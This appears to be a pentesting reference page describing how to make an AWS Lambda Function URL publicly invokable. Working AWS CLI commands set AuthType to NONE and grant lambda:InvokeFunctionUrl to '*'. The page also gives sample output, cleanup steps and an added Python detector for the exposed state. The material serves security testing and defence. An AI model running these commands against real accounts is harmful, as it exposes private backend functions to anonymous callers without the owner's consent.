AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)


Turn a private Lambda Function URL into a public, unauthenticated endpoint by switching the Function URL AuthType to NONE and attaching a resource-based policy that grants lambda:InvokeFunctionUrl to everyone. This enables anonymous invocation of internal functions and can expose sensitive backend operations.

Abuse

  • Prerequisites: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
  • Region: us-east-1

Steps

  1. Ensure the function has a Function URL (typically AWS_IAM):
aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
  2. Switch the URL to public (AuthType NONE):
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE
  3. Add a resource-based policy statement that allows unauthenticated principals:
aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE
  4. Retrieve the URL and invoke it without credentials:
URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"

Impact

  • The Lambda function becomes reachable by anyone on the internet without authentication.

Example output (unauthenticated 200)

HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}

Cleanup

aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
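
To confirm whether a function is in the exposed state described above (or that cleanup took effect), the following added example, which is not part of the original page, evaluates the parsed output of `aws lambda get-function-url-config` and `aws lambda get-policy` for both halves of the exposure. The sample inputs are constructed, and the account ID and function name `demo-fn` are placeholders.

```python
import fnmatch
import json

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _anyone(principal):
    # "Principal": "*" and "Principal": {"AWS": "*"} both mean any caller.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def public_url_statements(policy_response):
    """Sids of statements that let anyone call lambda:InvokeFunctionUrl.

    policy_response is parsed `aws lambda get-policy` output; its "Policy"
    field is itself a JSON-encoded string.
    """
    hits = []
    for stmt in json.loads(policy_response["Policy"]).get("Statement", []):
        if stmt.get("Effect") != "Allow" or not _anyone(stmt.get("Principal")):
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        if not any(fnmatch.fnmatchcase("lambda:invokefunctionurl", a) for a in actions):
            continue
        conds = {k.lower(): v for op in stmt.get("Condition", {}).values()
                 for k, v in op.items()}
        auth = conds.pop("lambda:functionurlauthtype", "NONE")
        # Any other condition key (e.g. aws:PrincipalOrgID) narrows the grant.
        if not conds and "NONE" in _as_list(auth):
            hits.append(stmt.get("Sid", "<no-sid>"))
    return hits

def is_publicly_exposed(url_config, policy_response):
    """True only when AuthType is NONE and a public invoke grant exists."""
    return url_config.get("AuthType") == "NONE" and bool(public_url_statements(policy_response))

# Constructed sample data: placeholder account ID and function name.
SAMPLE_URL_CONFIG = {"AuthType": "NONE"}
SAMPLE_POLICY = {"Policy": json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "ht-public-url", "Effect": "Allow", "Principal": "*",
    "Action": "lambda:InvokeFunctionUrl",
    "Resource": "arn:aws:lambda:us-east-1:123456789012:function:demo-fn",
    "Condition": {"StringEquals": {"lambda:FunctionUrlAuthType": "NONE"}}}]})}

if __name__ == "__main__":
    print(public_url_statements(SAMPLE_POLICY))
    print(is_publicly_exposed(SAMPLE_URL_CONFIG, SAMPLE_POLICY))
```

A wildcard grant that survives after AuthType is set back to AWS_IAM still shows up in `public_url_statements`, which is a cue to remove the leftover statement.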
